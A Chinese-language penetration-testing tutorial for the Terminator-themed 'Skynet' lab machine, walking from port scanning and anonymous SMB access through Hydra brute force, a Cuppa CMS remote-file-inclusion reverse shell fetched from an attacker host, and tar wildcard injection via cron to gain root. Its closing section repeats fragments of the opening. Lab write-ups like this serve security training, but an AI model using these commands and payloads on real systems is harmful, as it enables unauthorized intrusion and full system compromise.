Skynet渗透测试教学文档<\/h1>

目标概述<\/h2>
Skynet是一台运行易受攻击的Terminator主题的Linux计算机，开放了SSH、HTTP、SMB、IMAP、POP3和NetBIOS六个端口。本教学将详细讲解如何从初始信息收集到最终获取root权限的完整渗透测试过程。<\/p>

初始信息收集<\/h2>

端口扫描<\/h3>

使用nmap进行初始扫描发现开放端口：<\/p>

nmap -sV -p- <目标IP>
<\/code><\/pre>
发现开放服务：<\/p>

SSH (22)<\/li>
HTTP (80)<\/li>
SMB (445)<\/li>
IMAP (143)<\/li>
POP3 (110)<\/li>
NetBIOS (139)<\/li>
<\/ul>
Web服务枚举<\/h3>


访问HTTP服务：<\/p>
http:\/\/<目标IP>
<\/code><\/pre>
<\/li>

使用Wappalyzer识别Web服务器版本：Apache 2.4.18<\/p>
<\/li>

检查Searchsploit中该版本的漏洞：<\/p>
searchsploit Apache 2.4.18
<\/code><\/pre>
发现无直接可利用漏洞<\/p>
<\/li>

使用Gobuster进行目录扫描：<\/p>
gobuster dir -u http:\/\/<目标IP> -w \/usr\/share\/wordlists\/dirb\/common.txt
<\/code><\/pre>
发现\/squirrelmail目录<\/p>
<\/li>
<\/ol>
SMB枚举<\/h2>
匿名访问检查<\/h3>


使用smbmap检查共享权限：<\/p>
smbmap -H <目标IP>
<\/code><\/pre>
发现Anonymous共享允许匿名访问<\/p>
<\/li>

递归列出共享内容：<\/p>
smbmap -R anonymous -H <目标IP>
<\/code><\/pre>
发现attention.txt和logs目录<\/p>
<\/li>
<\/ol>
下载文件<\/h3>

使用smbclient连接：
smbclient \/\/<目标IP>\/anonymous
<\/code><\/pre>
<\/li>
下载文件：
get attention.txt
cd logs
get log1.txt
get log2.txt
get log3.txt
<\/code><\/pre>
<\/li>
<\/ol>
文件分析<\/h3>


attention.txt内容：<\/p>
近期系统故障导致多处密码被更改。所有天网员工在看到此信息后，必须立即更改密码。
<\/code><\/pre>
提示用户名：Miles Dyson<\/p>
<\/li>

log1.txt内容：

包含可能的密码列表（与《终结者》电影相关）<\/p>
<\/li>
<\/ol>
SquirrelMail暴力破解<\/h2>


访问SquirrelMail登录页面：<\/p>
http:\/\/<目标IP>\/squirrelmail
<\/code><\/pre>
<\/li>

使用Hydra进行暴力破解：<\/p>
hydra -s 80 -l milesdyson -P logs\/log1.txt <目标IP> http-post-form "\/squirrelmail\/src\/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=0&just_logged_in=1:Unknown user or password incorrect." -f
<\/code><\/pre>
<\/li>

登录后查看邮件，发现密码重置邮件包含SMB密码<\/p>
<\/li>
<\/ol>
SMB认证访问<\/h2>


使用获得的凭证连接SMB：<\/p>
smbclient \/\/<目标IP>\/milesdyson -U Milesdyson
<\/code><\/pre>
<\/li>

发现notes文件夹和important.txt文件：<\/p>
cd notes
get important.txt
<\/code><\/pre>
<\/li>

important.txt内容：<\/p>
提醒自己需要使用特定路径\/45kra24zxs28v3yd向beta CMS添加功能
<\/code><\/pre>
<\/li>
<\/ol>
Web目录深入<\/h2>


访问发现的隐藏目录：<\/p>
http:\/\/<目标IP>\/45kra24zxs28v3yd
<\/code><\/pre>
<\/li>

使用Gobuster扫描该目录：<\/p>
gobuster dir -u http:\/\/<目标IP>\/45kra24zxs28v3yd -w \/usr\/share\/wordlists\/dirb\/common.txt
<\/code><\/pre>
发现\/administrator目录<\/p>
<\/li>

访问Cuppa CMS登录页面：<\/p>
http:\/\/<目标IP>\/45kra24zxs28v3yd\/administrator
<\/code><\/pre>
<\/li>
<\/ol>
Cuppa CMS漏洞利用<\/h2>


搜索Cuppa CMS漏洞：<\/p>
searchsploit Cuppa CMS
<\/code><\/pre>
发现远程文件包含(RFI)漏洞<\/p>
<\/li>

利用步骤：<\/p>

修改php反向shell脚本（设置IP和端口）<\/li>
启动Python HTTP服务器：
python3 -m http.server 80
<\/code><\/pre>
<\/li>
设置Netcat监听器：
nc -nvlp <监听端口>
<\/code><\/pre>
<\/li>
利用RFI获取反向shell：
http:\/\/<目标IP>\/45kra24zxs28v3yd\/administrator\/alerts\/alertConfigField.php?urlConfig=http:\/\/<攻击者IP>\/reverse_shell.php
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

稳定获得的shell：<\/p>
python3 -c 'import pty; pty.spawn("\/bin\/bash")'
export TERM=xterm
<\/code><\/pre>
<\/li>
<\/ol>
权限提升<\/h2>
信息收集<\/h3>


下载并运行Linpeas：<\/p>
wget http:\/\/<攻击者IP>\/linpeas.sh
chmod +x linpeas.sh
.\/linpeas.sh
<\/code><\/pre>
<\/li>

发现关键信息：<\/p>

\/home\/milesdyson\/backups\/backup.sh脚本<\/li>
该脚本由root通过cron每分钟执行<\/li>
<\/ul>
<\/li>
<\/ol>
备份脚本分析<\/h3>
backup.sh内容：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>cd \/var\/www\/html
<\/span><\/span>tar cf \/home\/milesdyson\/backups\/backup.tgz *
<\/span><\/span><\/code><\/pre>通配符注入攻击<\/h3>


创建恶意文件：<\/p>
echo -e '#!\/bin\/bash\nchmod +s \/bin\/bash' > \/var\/www\/html\/root_shell.sh
chmod +x \/var\/www\/html\/root_shell.sh
touch "\/var\/www\/html\/--checkpoint-action=exec=sh root_shell.sh"
touch "\/var\/www\/html\/--checkpoint=1"
<\/code><\/pre>
<\/li>

等待cron执行（最多1分钟）<\/p>
<\/li>

检查\/bin\/bash权限：<\/p>
ls -la \/bin\/bash
<\/code><\/pre>
应显示SUID位已设置（-rwsr-xr-x）<\/p>
<\/li>

获取root shell：<\/p>
\/bin\/bash -p
<\/code><\/pre>
<\/li>
<\/ol>
替代方法（修改sudoers）<\/h3>


创建恶意脚本：<\/p>
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > \/etc\/sudoers' > \/var\/www\/html\/pavan.sh
chmod +x \/var\/www\/html\/pavan.sh
<\/code><\/pre>
<\/li>

创建触发文件：<\/p>
touch "\/var\/www\/html\/--checkpoint-action=exec=sh pavan.sh"
touch "\/var\/www\/html\/--checkpoint=1"
<\/code><\/pre>
<\/li>

等待执行后验证：<\/p>
sudo -l
sudo bash
<\/code><\/pre>
<\/li>
<\/ol>
总结<\/h2>
本渗透测试过程涵盖了从初始信息收集到最终权限提升的完整链条，关键点包括：<\/p>

SMB匿名访问的信息泄露<\/li>
SquirrelMail的暴力破解<\/li>
通过SMB获取的凭证和提示信息<\/li>
Web目录的深入枚举<\/li>
Cuppa CMS的RFI漏洞利用<\/li>
利用cron job和tar通配符注入进行权限提升<\/li>
<\/ol>
这种系统性的方法展示了如何将各个发现串联起来形成完整的攻击链，最终获取系统最高权限。<\/p>

Skynet渗透测试教学文档<\/h1>

目标概述<\/h2> Skynet是一台运行易受攻击的Terminator主题的Linux计算机，开放了SSH、HTTP、SMB、IMAP、POP3和NetBIOS六个端口。本教学将详细讲解如何从初始信息收集到最终获取root权限的完整渗透测试过程。<\/p>

初始信息收集<\/h2>

SMB枚举<\/h2>

权限提升<\/h2>

目标概述<\/h2>
Skynet是一台运行易受攻击的Terminator主题的Linux计算机，开放了SSH、HTTP、SMB、IMAP、POP3和NetBIOS六个端口。本教学将详细讲解如何从初始信息收集到最终获取root权限的完整渗透测试过程。<\/p>